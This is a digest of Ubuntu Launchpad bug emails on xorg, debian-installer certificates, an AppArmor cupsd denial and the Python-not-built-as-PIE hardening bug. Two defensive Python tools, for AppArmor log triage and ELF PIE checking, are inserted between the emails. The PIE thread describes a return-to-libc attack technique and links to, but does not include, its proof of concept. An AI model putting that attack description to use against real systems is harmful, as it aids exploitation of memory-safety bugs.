Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

https://bugs.launchpad.net/bugs/1975408

Title: Performance is much worse than expected (Normal friendly behaviors)

Status in xorg package in Ubuntu: New

Bug description:

Operating System: Ubuntu 22.04
Life cycle: LTS
Architecture: AMD64
Kernel version (uname -a): 5.15.0-30-generic

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: xorg 1:7.7+23ubuntu2
ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30
Uname: Linux 5.15.0-30-generic x86_64
ApportVersion: 2.20.11-0ubuntu82.1
Architecture: amd64
CasperMD5CheckResult: unknown
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: None
CurrentDesktop: ubuntu:GNOME
Date: Sun May 22 12:10:30 2022
DistUpgraded: Fresh install
DistroCodename: jammy
DistroVariant: ubuntu
DkmsStatus: sysdig/0.27.1, 5.15.0-30-generic, x86_64: installed
ExtraDebuggingInterest: Yes, if not too technical
GraphicsCard:
 Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] (rev 09) (prog-if 00 [VGA controller])
   Subsystem: Hewlett-Packard Company 3rd Gen Core processor Graphics Controller [103c:17f4]
MachineType: Hewlett-Packard HP ProBook 4540s
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-30-generic root=UUID=cf164159-2e29-4cee-aef2-f8d16c319f1a ro snapd_recovery_mode snap_core quiet splash crashkernel=512M-:192M vt.handoff=7
SourcePackage: xorg
Symptom: display
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/11/2019
dmi.bios.release: 15.104
dmi.bios.vendor: Hewlett-Packard
dmi.bios.version: 68IRR Ver. F.68
dmi.board.name: 17F6
dmi.board.vendor: Hewlett-Packard
dmi.board.version: KBC Version 58.21
dmi.chassis.type: 10
dmi.chassis.vendor: Hewlett-Packard
dmi.ec.firmware.release: 88.33
dmi.modalias: dmi:bvnHewlett-Packard:bvr68IRRVer.F.68:bd04/11/2019:br15.104:efr88.33:svnHewlett-Packard:pnHPProBook4540s:pvrA1008C11:rvnHewlett-Packard:rn17F6:rvrKBCVersion58.21:cvnHewlett-Packard:ct10:cvr:skuB7A48EA#ABV:
dmi.product.family: 103C_5336AN G=N L=BUS B=HP S=PRO
dmi.product.name: HP ProBook 4540s
dmi.product.sku: B7A48EA#ABV
dmi.product.version: A1008C11
dmi.sys.vendor: Hewlett-Packard
version.compiz: compiz 1:0.9.14.1+22.04.20211217-0ubuntu2
version.libdrm2: libdrm2 2.4.110+git2205140500.3f266e~oibaf~j
version.libgl1-mesa-dri: libgl1-mesa-dri 22.2~git2205160600.3c0f34~oibaf~j
version.libgl1-mesa-glx: libgl1-mesa-glx 22.2~git2205170600.fffafa~oibaf~j
version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1
[Touch-packages] [Bug 1975381] Re: firewall gets disabled
Thank you for taking the time to report this bug and helping to make Ubuntu better. Unfortunately we can't fix it, because your description didn't include enough information.

You may find it helpful to read 'How to report bugs effectively' http://www.chiark.greenend.org.uk/~sgtatham/bugs.html. We'd be grateful if you would then provide a more complete description of the problem.

We have instructions on debugging some types of problems at http://wiki.ubuntu.com/DebuggingProcedures.

At a minimum, we need:

1. the specific steps or actions you took that caused you to encounter the problem,
2. the behavior you expected, and
3. the behavior you actually encountered (in as much detail as possible).

Thanks!

** Changed in: iptables (Ubuntu)
   Status: New => Incomplete

** Information type changed from Private Security to Public Security

https://bugs.launchpad.net/bugs/1975381

Title: firewall gets disabled

Status in iptables package in Ubuntu: Incomplete

Bug description:

Operating System: Ubuntu 22.04
Life cycle: LTS
Architecture: AMD64
Kernel version (uname -a): 5.15.0-30-generic

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: iptables 1.8.7-1ubuntu5
ProcVersionSignature: Ubuntu 5.15.0-30.31-generic 5.15.30
Uname: Linux 5.15.0-30-generic x86_64
ApportVersion: 2.20.11-0ubuntu82
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Mon May 16 23:44:26 2022
SourcePackage: iptables
UpgradeStatus: No upgrade log present (probably fresh install)
[Touch-packages] [Bug 1973654] Re: Using debian-installer on a server with a Let's Encrypt cert dies
I believe this is caused by debootstrap - it only uses packages from the release pocket (and this is frozen from the time Ubuntu 20.04 LTS was originally released). This is a known issue https://askubuntu.com/questions/744684/latest-security-updates-with-debootstrap but I am not sure if there is much you can do to get debian-installer to say use multistrap instead of debootstrap.

** Package changed: ca-certificates (Ubuntu) => debian-installer (Ubuntu)

https://bugs.launchpad.net/bugs/1973654

Title: Using debian-installer on a server with a Let's Encrypt cert dies

Status in debian-installer package in Ubuntu: New

Bug description:

While using debian-installer to install Ubuntu Focal, I get the following error:

  May 16 22:02:41 base-installer: Certificate verification failed: The certificate is NOT trusted. The certificate chain uses expired certificate. Could not handshake: Error in the certificate verification. [IP: 129.59.59.10 443]

There was an issue in 2021, where the "DST_Root_CA_X3.crt" certificate used by Let's Encrypt expired.
https://letsencrypt.org/docs/dst-root-ca-x3-expiration-september-2021/

The problem is that the certificate is still included in the "ca-certificates_20190110ubuntu1_all.deb" that debian-installer fetches during install.

  May 16 22:02:17 debootstrap: Preparing to unpack .../ca-certificates_20190110ubuntu1_all.deb ...
  May 16 22:02:17 debootstrap: Unpacking ca-certificates (20190110ubuntu1) ...
  May 16 22:02:31 debootstrap: Setting up ca-certificates (20190110ubuntu1) ...
  May 16 22:02:40 debootstrap: Processing triggers for ca-certificates (20190110ubuntu1) ...
  May 16 22:02:40 debootstrap: Running hooks in /etc/ca-certificates/update.d...

Because the certificate is expired, debian-installer dies with:

  May 16 22:02:41 base-installer: Certificate verification failed: The certificate is NOT trusted. The certificate chain uses expired certificate. Could not handshake: Error in the certificate verification. [IP: 129.59.59.10 443]

Can Ubuntu update the ca-certificate .deb pulled during install to one that does not have DST_Root_CA_X3.crt?

Thanks.
[Touch-packages] [Bug 1971288] Re: Merge libseccomp from Debian unstable for kinetic
I uploaded https://launchpad.net/ubuntu/+source/libseccomp/2.5.4-1ubuntu1 earlier today.

** Changed in: libseccomp (Ubuntu)
   Status: New => Fix Committed

https://bugs.launchpad.net/bugs/1971288

Title: Merge libseccomp from Debian unstable for kinetic

Status in libseccomp package in Ubuntu: Fix Committed

Bug description:

Upstream: tbd
Debian: 2.5.4-1
Ubuntu: 2.5.3-2ubuntu2

### Old Ubuntu Delta ###

libseccomp (2.5.3-2ubuntu2) jammy; urgency=medium

  * No-change rebuild with Python 3.10 only

 -- Graham Inggs  Thu, 17 Mar 2022 19:27:18 +

libseccomp (2.5.3-2ubuntu1) jammy; urgency=medium

  * Merge from Debian unstable; remaining changes:
    - Add autopkgtests
  * Added changes:
    - Update autopkgtests to use syscalls from 5.16-rc1

 -- Alex Murray  Thu, 24 Feb 2022 09:53:35 +1030
[Touch-packages] [Bug 1968397]
Thank you for using Ubuntu and taking the time to report a bug. Your report should contain, at a minimum, the following information so we can better find the source of the bug and work to resolve it.

Submitting the bug about the proper source package is essential. For help see https://wiki.ubuntu.com/Bugs/FindRightPackage .

Additionally, in the report please include:

1) The release of Ubuntu you are using, via 'cat /etc/lsb-release' or System -> About Ubuntu.
2) The version of the package you are using, via 'dpkg -l PKGNAME | cat' or by checking in Synaptic.
3) What happened and what you expected to happen.

The Ubuntu community has also created debugging procedures for a wide variety of packages at https://wiki.ubuntu.com/DebuggingProcedures . Following the debugging instructions for the affected package will make your bug report much more complete. Thanks!

https://bugs.launchpad.net/bugs/1968397

Title: bootloader

Status in xorg package in Ubuntu: Invalid

Bug description:

root@a-ThinkPad-X220:~# apt install telnetd
E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用)
E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它?
root@a-ThinkPad-X220:~# apt install telnetd
E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用)
E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它?
root@a-ThinkPad-X220:~# killall

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: xorg 1:7.7+13ubuntu3.1
ProcVersionSignature: Ubuntu 4.15.0-112.113~16.04.1-generic 4.15.18
Uname: Linux 4.15.0-112-generic x86_64
.tmp.unity_support_test.0:
ApportVersion: 2.20.1-0ubuntu2.24
Architecture: amd64
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
CompositorUnredirectFSW: true
Date: Sat Apr 9 13:01:34 2022
DistUpgraded: Fresh install
DistroCodename: xenial
DistroVariant: ubuntu
ExtraDebuggingInterest: No
GraphicsCard:
 Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0116] (rev 09) (prog-if 00 [VGA controller])
   Subsystem: Lenovo 2nd Generation Core Processor Family Integrated Graphics Controller [17aa:21da]
InstallationDate: Installed on 2022-04-07 (1 days ago)
InstallationMedia: Ubuntu 16.04.7 LTS "Xenial Xerus" - Release amd64 (20200806)
MachineType: LENOVO 4286AC9
ProcEnviron:
 LANGUAGE=zh_CN:zh
 PATH=(custom, no user)
 LANG=zh_CN.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-112-generic root=UUID=cf25f7a7-bda4-4979-9a0f-eb1cb472be49 ro quiet splash vt.handoff=7
SourcePackage: xorg
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 06/21/2018
dmi.bios.vendor: LENOVO
dmi.bios.version: 8DET76WW (1.46 )
dmi.board.asset.tag: Not Available
dmi.board.name: 4286AC9
dmi.board.vendor: LENOVO
dmi.board.version: Not Available
dmi.chassis.asset.tag: No Asset Information
dmi.chassis.type: 10
dmi.chassis.vendor: LENOVO
dmi.chassis.version: Not Available
dmi.modalias: dmi:bvnLENOVO:bvr8DET76WW(1.46):bd06/21/2018:svnLENOVO:pn4286AC9:pvrThinkPadX220:rvnLENOVO:rn4286AC9:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
dmi.product.family: ThinkPad X220
dmi.product.name: 4286AC9
dmi.product.version: ThinkPad X220
dmi.sys.vendor: LENOVO
version.compiz: compiz 1:0.9.12.3+16.04.20180221-0ubuntu1
version.ia32-libs: ia32-libs N/A
version.libdrm2: libdrm2 2.4.91-2~16.04.1
version.libgl1-mesa-dri: libgl1-mesa-dri 18.0.5-0ubuntu0~16.04.1
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 18.0.5-0ubuntu0~16.04.1
version.xserver-xorg-core: xserver-xorg-core N/A
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
version.xserver-xorg-video-ati: xserver-xorg-video-ati N/A
version.xserver-xorg-video-intel: xserver-xorg-video-intel N/A
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A
xserver.bootTime: Sat Apr 9 20:55:35 2022
xserver.configfile: default
xserver.errors:
xserver.logfile: /var/log/Xorg.0.log
xserver.version: 2:1.19.6-1ubuntu4.1~16.04.2
xserver.video_driver: modeset
[Touch-packages] [Bug 1968397] Re: bootloader
Thank you for taking the time to report this bug and helping to make Ubuntu better. Unfortunately we can't fix it, because your description didn't include enough information.

You may find it helpful to read 'How to report bugs effectively' http://www.chiark.greenend.org.uk/~sgtatham/bugs.html. We'd be grateful if you would then provide a more complete description of the problem.

We have instructions on debugging some types of problems at http://wiki.ubuntu.com/DebuggingProcedures.

At a minimum, we need:

1. the specific steps or actions you took that caused you to encounter the problem,
2. the behavior you expected, and
3. the behavior you actually encountered (in as much detail as possible).

Thanks!

** Changed in: xorg (Ubuntu)
   Status: New => Incomplete

** Information type changed from Private Security to Public

** Changed in: xorg (Ubuntu)
   Status: Incomplete => Invalid

https://bugs.launchpad.net/bugs/1968397

Title: bootloader

Status in xorg package in Ubuntu: Invalid
[Touch-packages] [Bug 1968402] Re: Ubuntu 20.04.3 boots to black screen, no TTY available
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

https://bugs.launchpad.net/bugs/1968402

Title: Ubuntu 20.04.3 boots to black screen, no TTY available

Status in gdm: New
Status in gnome-session: New
Status in grub: New
Status in os-prober-efi/trunk: New
Status in shim: New
Status in subiquity: New
Status in tty: New
Status in grub2 package in Ubuntu: New
Status in mutter package in Ubuntu: New
Status in nvidia-graphics-drivers-450 package in Ubuntu: New
Status in wayland package in Ubuntu: New
Status in xorg package in Ubuntu: New

Bug description:

A fresh attempted install failed utterly, just as 20.04.1 failed two years ago. Has anyone been paying attention?

Ubuntu 20.04.3 burned just now to a USB stick and attempted to be installed.

The first fail was that the stick booted to a couple of impenetrable boot-time messages and hung. Really. I'm not making this up. It didn't just open the installer, as it should.

The second fail was having just to guess that rebooting and trying another GRUB menu option might work and give that a try. Really. I'm not making this up, either. The installer was entirely incapable of providing any direction.

The third failure was that the installer was incapable of detecting the video configuration and proceeding accordingly. This is 20.04.3, the third attempt at getting this right, and it still fails.

The fourth fail was an error message insisting on a designation of where root should be, even after the destination partition already had been specified.

The fifth failure was that no obvious means existed to satisfy the installer about the root specification, which of course already had been made by specifying the destination partition. All one could do was to see whether a context menu existed for any object on the screen that might possibly drill down through a few layers to something approximating what the content of the error message suggested.

The sixth failure was that no GRUB menu appeared during boot, notwithstanding that the EFI system partition had clearly been identified in the installer.

The seventh failure was that the machine booted only to a black screen with a non-blinking _ midway toward the upper left. No login screen/display manager. No GUI at all. Just this little _.

The eighth failure was that Ctrl-alt-f2, ctrl-alt-f5-f12 have no effect. No TTY is available. There is no way whatsoever to interact with the system.

Expected behavior: The software would install and the computer would work.

Actual behavior: The installer bricked my workstation.

Obviously, no debug information is available BECAUSE THE SOFTWARE FAILED. This post is being made from a borrowed Windows laptop.

Any thoughts about how to get a working system would be appreciated. I am not optimistic about the prospects for 22.04.
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
Nice - thanks @sdeziel

https://bugs.launchpad.net/bugs/1452115

Title: Python interpreter binary is not compiled as PIE

Status in Python: New
Status in python2.7 package in Ubuntu: Fix Released
Status in python3.10 package in Ubuntu: Fix Released
Status in python3.4 package in Ubuntu: Fix Released
Status in python3.6 package in Ubuntu: Confirmed
Status in python3.7 package in Ubuntu: Confirmed
Status in python3.8 package in Ubuntu: Confirmed
Status in python3.9 package in Ubuntu: New
Status in python3.7 package in Debian: New
Status in python3.8 package in Debian: New

Bug description:

The python2.7 binary (installed at /usr/bin/python2.7; package version 2.7.6-8) is not compiled as a position independent executable (PIE). It appears that the python compilation process is somewhat arcane and the hardening wrapper probably doesn't do the trick for it.

This is incredibly dangerous as it means that any vulnerability within a native module (e.g. ctypes-based), or within python itself will expose an incredibly large amount of known memory contents at known addresses (including a large number of dangerous instruction groupings). This enables ROP-based (https://en.wikipedia.org/wiki/Return-oriented_programming) to abuse the interpreter itself to bypass non-executable page protections.

I have put together an example vulnerable C shared object (with a buffer overflow) accessed via python through the ctypes interface as an example. This uses a single ROP "gadget" on top of using the known PLT location for system(3) (https://en.wikipedia.org/wiki/Return-to-libc_attack) to call "id".

The example code is accessible at:
- https://gist.github.com/ChaosData/ae6076cb1c3cc7b0a367

I'm not exactly familiar enough with the python build process to say where exactly an -fPIE needs to be injected into a script/makefile, but I feel that given the perceived general preference for ctypes-based modules over python written ones, as the native code implementations tend to be more performant, this feels like a large security hole within the system.

Given the nature of this "issue," I'm not 100% sure of where it is best reported, but from what I can tell, this conflicts with the Ubuntu hardening features and is definitely exploitable should a native module contain a sufficiently exploitable vulnerability that allows for control of the instruction register.
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
Thanks @doko :)

--
https://bugs.launchpad.net/bugs/1452115

Title:
Python interpreter binary is not compiled as PIE

Status in Python: New
Status in python2.7 package in Ubuntu: Fix Released
Status in python3.10 package in Ubuntu: Fix Committed
Status in python3.4 package in Ubuntu: Fix Released
Status in python3.6 package in Ubuntu: Confirmed
Status in python3.7 package in Ubuntu: Confirmed
Status in python3.8 package in Ubuntu: Confirmed
Status in python3.9 package in Ubuntu: New
Status in python3.7 package in Debian: New
Status in python3.8 package in Debian: New
[Touch-packages] [Bug 1964325] Re: Fails to print due to apparmor denied connect operation for cupsd - /run/systemd/userdb/io.systemd.Machine
I have proposed a fix for this upstream - https://gitlab.com/apparmor/apparmor/-/merge_requests/861 - once that is reviewed then we can include the fix in jammy.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1964325

Title:
Fails to print due to apparmor denied connect operation for cupsd - /run/systemd/userdb/io.systemd.Machine

Status in apparmor package in Ubuntu: New

Bug description:
On an up to date Jammy machine, printing fails and there is the following apparmor denied message in the journal:

apparmor="DENIED" operation="connect" profile="/usr/sbin/cupsd" name="/run/systemd/userdb/io.systemd.Machine" pid=892182 comm="cupsd" requested_mask="w" denied_mask="w" fsuid=0 ouid=0

Printing works after running aa-complain cupsd.

The printer is a driverless HP Envy 5020

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: apparmor 3.0.4-2ubuntu1
ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12
Uname: Linux 5.15.0-18-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.11-0ubuntu78
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
Date: Wed Mar 9 10:25:10 2022
InstallationDate: Installed on 2020-05-31 (647 days ago)
InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Alpha amd64 (20200527)
ProcKernelCmdline: BOOT_IMAGE=/BOOT/ubuntu_nt06gx@/vmlinuz-5.15.0-18-generic root=ZFS=rpool/ROOT/ubuntu_nt06gx ro snd-intel-dspcfg.dsp_driver=1
RebootRequiredPkgs: Error: path contained symlinks.
SourcePackage: apparmor
UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1964325/+subscriptions
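The denial quoted in the bug description is the kind of journal line a defender triages before deciding between a targeted profile rule and the much broader `aa-complain cupsd` workaround. The following is an added example, not code from the bug report, the apparmor project or the linked merge request: it parses AppArmor audit records into key/value fields, groups DENIED events by profile, and drafts candidate file rules for an administrator to review. Apart from the quoted cupsd denial, the sample log lines are constructed, and rendering a path-based `connect` denial as a file `w` rule is this example's choice of presentation, not a statement of what the upstream fix did.

```python
import re
from collections import defaultdict

# Constructed sample journal excerpt. The first audit line is the denial
# quoted in the bug report; the others are made up to exercise grouping,
# complain-mode (ALLOWED) records and a line with no audit fields at all.
SAMPLE_LOG = """\
kernel: audit: type=1400 audit(1646818910.123:456): apparmor="DENIED" operation="connect" profile="/usr/sbin/cupsd" name="/run/systemd/userdb/io.systemd.Machine" pid=892182 comm="cupsd" requested_mask="w" denied_mask="w" fsuid=0 ouid=0
kernel: audit: type=1400 audit(1646818911.456:457): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/hypothetical.conf" pid=892182 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
kernel: audit: type=1400 audit(1646818912.789:458): apparmor="ALLOWED" operation="open" profile="/usr/sbin/cupsd" name="/etc/cups/cupsd.conf" pid=892182 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
cupsd[892182]: Printer added.
"""

# key="quoted value" or key=bareword, as the kernel audit subsystem emits them
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_audit_line(line):
    """Return the key/value fields of an AppArmor audit line, or None if the
    line carries no apparmor= field (ordinary daemon output, for instance)."""
    fields = {}
    for m in KV_RE.finditer(line):
        key, quoted, bare = m.group(1), m.group(3), m.group(4)
        fields[key] = quoted if quoted is not None else bare
    return fields if "apparmor" in fields else None


def collect_denials(log_text):
    """Group DENIED events as profile -> {(name, operation): set of mask letters}.
    ALLOWED records (complain mode) are deliberately skipped: they show what a
    profile *would* block, but only DENIED records explain a failing service."""
    denials = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        f = parse_audit_line(line)
        if not f or f.get("apparmor") != "DENIED" or "profile" not in f:
            continue
        key = (f.get("name", ""), f.get("operation", ""))
        denials[f["profile"]][key].update(f.get("denied_mask", ""))
    return denials


def draft_file_rules(denials):
    """Turn path-based denials into candidate AppArmor file rules, one list per
    profile. Only denials that name a filesystem path are translated; the
    result is a review aid for the profile author, not something to apply blindly."""
    rules = {}
    for profile, events in denials.items():
        lines = []
        for (name, operation), masks in sorted(events.items()):
            if not name.startswith("/"):
                continue  # network/capability denials need different rule syntax
            perms = "".join(sorted(masks))
            lines.append(f"  {name} {perms},  # from operation={operation}")
        rules[profile] = lines
    return rules


if __name__ == "__main__":
    for profile, lines in draft_file_rules(collect_denials(SAMPLE_LOG)).items():
        print(f"# candidate additions for profile {profile}")
        print("\n".join(lines))
```

Run against a real journal (`journalctl -k | python3 this_script.py` after swapping `SAMPLE_LOG` for `sys.stdin.read()`), this turns a page of denials into a short list of specific rules to evaluate. That is the point of the exercise: `aa-complain` stops enforcement for the whole cupsd profile, whereas the denial itself identifies the single path the daemon needs.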
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
For posterity - this is how I did the analysis above:

# download the current python3.9 source package and rebuild it with PIE enabled
apt source python3.9
cd python3.9-3.9.10/
sed -i "/export DEB_BUILD_MAINT_OPTIONS=hardening=-pie/d" debian/rules
dch -i -D jammy "Enable PIE (LP: #1452115)"
update-maintainer
# sbuild assumes you already have a jammy-amd64 schroot setup
sbuild

# use a LXD VM for testing
lxc launch --vm images:ubuntu/jammy sec-jammy-amd64
# stop the VM and disable UEFI secure boot
lxc stop sec-jammy-amd64
# ensure secureboot is not used so we can use the msr module later
lxc config set sec-jammy-amd64 security.secureboot=false
lxc start sec-jammy-amd64
# make sure VM has full disk allocated
lxc exec sec-jammy-amd64 -- growpart /dev/sda 2
lxc exec sec-jammy-amd64 -- resize2fs /dev/sda2
lxc file push ../*.deb sec-jammy-amd64/root/
lxc shell sec-jammy-amd64

# then inside the LXD VM install and run pyperformance with and without the new python3.9
apt install python3-pip
pip3 install pyperformance
# tune for system performance
modprobe msr
python3.9 -m pyperf system tune
# get baseline numbers without PIE
pyperformance run --python=/usr/bin/python3.9 -o py3.9.json
# install our debs we built above that have PIE enabled
apt install ./python3.9_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-stdlib_3.9.10-2ubuntu1_amd64.deb ./python3.9-minimal_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-minimal_3.9.10-2ubuntu1_amd64.deb ./libpython3.9_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-dev_3.9.10-2ubuntu1_amd64.deb ./python3.9-dev_3.9.10-2ubuntu1_amd64.deb
# check they have PIE
apt install devscripts
hardening-check /usr/bin/python3.9
# re-run pyperformance with PIE
pyperformance run --python=/usr/bin/python3.9 -o py3.9-pie.json
# and compare the results
python3 -m pyperf compare_to py3.9.json py3.9-pie.json --table

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1452115

Title:
Python interpreter binary is not compiled as PIE

Status in Python: New
Status in python2.7 package in Ubuntu: Fix Released
Status in python3.10 package in Ubuntu: New
Status in python3.4 package in Ubuntu: Fix Released
Status in python3.6 package in Ubuntu: Confirmed
Status in python3.7 package in Ubuntu: Confirmed
Status in python3.8 package in Ubuntu: Confirmed
Status in python3.9 package in Ubuntu: New
Status in python3.7 package in Debian: New
Status in python3.8 package in Debian: New
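Both the original report (a fixed-address /usr/bin/python2.7) and the `hardening-check /usr/bin/python3.9` step in the rebuild recipe turn on a single ELF property: whether the main executable was linked to load at a fixed address or as position independent code that ASLR can relocate. As an added example, not code from the bug report or from Ubuntu's python packaging, the following Python reads only the ELF header and program headers to tell a fixed-address executable (e_type ET_EXEC) from a PIE (ET_DYN carrying a PT_INTERP program header) and from a plain shared library (ET_DYN without one), for both ELF classes and both byte orders. `make_elf64` builds constructed fixture images for the self-check; `check_file` works on real binaries, including the interpreter running the script.

```python
import struct
import sys

# ELF constants from the System V ABI
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3


def _parse_ehdr(head):
    """Decode the header fields this check needs from the first bytes of an ELF
    image. Returns (struct byte-order prefix, e_type, e_phoff, e_phentsize,
    e_phnum) or None if the bytes are not an ELF32/ELF64 header."""
    if len(head) < 52 or head[:4] != b"\x7fELF":
        return None
    end = "<" if head[5] == 1 else ">"           # EI_DATA: 1 = little, 2 = big endian
    if head[4] == 1:                              # EI_CLASS 1 = ELF32
        fields = struct.unpack_from(end + "HHIIIIIHHH", head, 16)
    elif head[4] == 2 and len(head) >= 64:        # EI_CLASS 2 = ELF64
        fields = struct.unpack_from(end + "HHIQQQIHHH", head, 16)
    else:
        return None
    # fields: e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
    #         e_flags, e_ehsize, e_phentsize, e_phnum
    e_type, e_phoff, e_phentsize, e_phnum = fields[0], fields[4], fields[8], fields[9]
    return end, e_type, e_phoff, e_phentsize, e_phnum


def _classify(end, e_type, phdrs, e_phentsize, e_phnum):
    if e_type == ET_EXEC:
        return "non-PIE executable"   # fixed load address: the case this bug is about
    if e_type != ET_DYN:
        return "not an executable"    # relocatable object, core dump, ...
    # ET_DYN covers both shared libraries and PIE binaries. A PT_INTERP
    # program header (the dynamic loader path) is what marks a runnable PIE.
    for i in range(e_phnum):
        off = i * e_phentsize
        if off + 4 > len(phdrs):
            break                     # truncated image: stop rather than misreport
        (p_type,) = struct.unpack_from(end + "I", phdrs, off)
        if p_type == PT_INTERP:
            return "PIE executable"
    return "shared object"


def elf_pie_status(data):
    """Classify an in-memory ELF image."""
    parsed = _parse_ehdr(data[:64])
    if parsed is None:
        return "not an ELF"
    end, e_type, e_phoff, e_phentsize, e_phnum = parsed
    phdrs = data[e_phoff:e_phoff + e_phentsize * e_phnum]
    return _classify(end, e_type, phdrs, e_phentsize, e_phnum)


def check_file(path):
    """Classify an on-disk binary, reading only its header and program headers."""
    with open(path, "rb") as f:
        parsed = _parse_ehdr(f.read(64))
        if parsed is None:
            return "not an ELF"
        end, e_type, e_phoff, e_phentsize, e_phnum = parsed
        f.seek(e_phoff)
        phdrs = f.read(e_phentsize * e_phnum)
    return _classify(end, e_type, phdrs, e_phentsize, e_phnum)


def make_elf64(e_type, p_types, little=True):
    """Constructed test fixture: a minimal ELF64 image made of a 64-byte header
    followed by 56-byte program headers of the given types (x86-64, no sections)."""
    end = "<" if little else ">"
    ident = b"\x7fELF" + bytes([2, 1 if little else 2, 1, 0]) + bytes(8)
    ehdr = ident + struct.pack(end + "HHIQQQIHHHHHH",
                               e_type, 0x3E, 1, 0, 64, 0, 0, 64, 56, len(p_types), 64, 0, 0)
    phdrs = b"".join(struct.pack(end + "IIQQQQQQ", p, 0, 0, 0, 0, 0, 0, 0) for p in p_types)
    return ehdr + phdrs


if __name__ == "__main__":
    print("fixed-address fixture:", elf_pie_status(make_elf64(ET_EXEC, [PT_LOAD])))
    print("PIE fixture:          ", elf_pie_status(make_elf64(ET_DYN, [PT_INTERP, PT_LOAD, PT_DYNAMIC])))
    print(sys.executable + ":", check_file(sys.executable))
```

PIE is only the ASLR half of what `hardening-check` reports; RELRO, stack protector and fortified sources are separate properties, so a "PIE executable" verdict here is one line of that report, not a substitute for it.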
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
I am actively looking at this - FWIW the performance results with PIE enabled look good - https://paste.ubuntu.com/p/PZjqMFSNSR/ - so I am discussing internally whether this is something that can still land for Ubuntu 22.04.

--
https://bugs.launchpad.net/bugs/1452115

Title:
Python interpreter binary is not compiled as PIE

Status in Python: New
Status in python2.7 package in Ubuntu: Fix Released
Status in python3.10 package in Ubuntu: New
Status in python3.4 package in Ubuntu: Fix Released
Status in python3.6 package in Ubuntu: Confirmed
Status in python3.7 package in Ubuntu: Confirmed
Status in python3.8 package in Ubuntu: Confirmed
Status in python3.9 package in Ubuntu: New
Status in python3.7 package in Debian: New
Status in python3.8 package in Debian: New
[Touch-packages] [Bug 1962276] Re: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed
See this related debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006368

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to upower in Ubuntu.
https://bugs.launchpad.net/bugs/1962276

Title:
[jammy] Laptop monitor does not turn off/disconnect when the lid is closed

Status in gnome-settings-daemon package in Ubuntu: New
Status in linux package in Ubuntu: Confirmed
Status in mutter package in Ubuntu: New
